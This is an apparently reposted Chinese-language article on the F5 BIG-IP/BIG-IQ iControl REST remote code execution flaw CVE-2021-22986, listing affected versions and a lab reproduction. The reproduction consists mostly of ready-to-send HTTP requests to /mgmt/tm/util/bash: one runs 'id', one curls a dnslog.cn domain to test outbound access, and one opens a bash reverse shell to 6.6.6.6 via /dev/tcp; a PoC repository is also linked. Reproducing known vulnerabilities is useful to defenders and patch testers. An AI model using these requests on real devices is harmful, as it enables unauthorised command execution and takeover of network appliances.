溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986的分析是怎樣的

發(fā)布時(shí)間:2021-12-29 17:40:38 來源:億速云 閱讀:289 作者:柒染 欄目:安全技術(shù)

F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986的分析是怎樣的,針對(duì)這個(gè)問題,這篇文章詳細(xì)介紹了相對(duì)應(yīng)的分析和解答,希望可以幫助更多想解決這個(gè)問題的小伙伴找到更簡(jiǎn)單易行的方法。

0x00漏洞簡(jiǎn)述

F5 BIG-IP 是美國(guó) F5 公司的一款集成了網(wǎng)絡(luò)流量管理、應(yīng)用程序安全管理、負(fù)載均衡等功能的應(yīng)用交付平臺(tái)。

2021 年3月10日,F(xiàn)5官方發(fā)布安全通告,安全更新包含了影響F5的BIG-IP,BIG-IQ設(shè)備的多個(gè)高危漏洞,漏洞編號(hào)分別為CVE-2021-22986,CVE-2021-22987,CVE-2021-22988,CVE-2021-22989,CVE-2021-22990,CVE-2021-22991,CVE-2021-22992;其中CVE-2021-22986為F5 BIG-IP/IQ設(shè)備 iControl REST接口的未授權(quán)遠(yuǎn)程代碼執(zhí)行漏洞,漏洞評(píng)分9.8,評(píng)級(jí)嚴(yán)重。F5安全公告更新了BIG-IP,BIG-IQ中的多個(gè)嚴(yán)重漏洞。建議廣大用戶及時(shí)將f5 big-iq,f5 big-ip升級(jí)到最新版本,避免遭到攻擊。

0x01影響版本

BIG-IP 16.0.0-16.0.1
BIG-IP 15.1.0-15.1.2
BIG-IP 14.1.0-14.1.3.1
BIG-IP 13.1.0-13.1.3.5
BIG-IP 12.1.0-12.1.5.2
BIG-IQ 7.1.0-7.1.0.2
BIG-IQ 7.0.0-7.0.0.1
BIG-IQ 6.0.0-6.1.0

0x02漏洞復(fù)現(xiàn)

部署安裝F5 BIG-IPV漏洞測(cè)試靶場(chǎng)環(huán)境。

1、訪問漏洞環(huán)境

F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986的分析是怎樣的

2、POC驗(yàn)證,進(jìn)行命令執(zhí)行操作

1.系統(tǒng)命令執(zhí)行

POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.3.112

Connection: close

Content-Length: 41

Cache-Control: max-age=0

Authorization: Basic YWRtaW46QVNhc1M=

X-F5-Auth-Token:

Upgrade-Insecure-Requests: 1

Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}

F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986的分析是怎樣的

2.通過dnslog探測(cè)是否可以出網(wǎng)

生成域名:zg8ie5.dnslog.cn

F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986的分析是怎樣的

出網(wǎng)探測(cè)

POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.3.112

Connection: close

Content-Length: 62

Cache-Control: max-age=0

Authorization: Basic YWRtaW46QVNhc1M=

X-F5-Auth-Token:

Upgrade-Insecure-Requests: 1

Content-Type: application/json

{"command":"run","utilCmdArgs":"-c 'curl zg8ie5.dnslog.cn'"}

F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986的分析是怎樣的

發(fā)現(xiàn)可以出網(wǎng)

F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986的分析是怎樣的

3.通過bash反彈shell到vps

POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.3.112

Connection: close

Content-Length: 83

Cache-Control: max-age=0

Authorization: Basic YWRtaW46QVNhc1M=

X-F5-Auth-Token:

Upgrade-Insecure-Requests: 1

Content-Type: application/json

{"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/6.6.6.6/12377 0>&1'"}

F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986的分析是怎樣的

漏洞驗(yàn)證python腳本

https://github.com/PeiQi0/PeiQi-WIKI-POC

0x03修復(fù)建議

升級(jí)到最新版本

關(guān)于F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986的分析是怎樣的問題的解答就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關(guān)注億速云行業(yè)資訊頻道了解更多相關(guān)知識(shí)。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI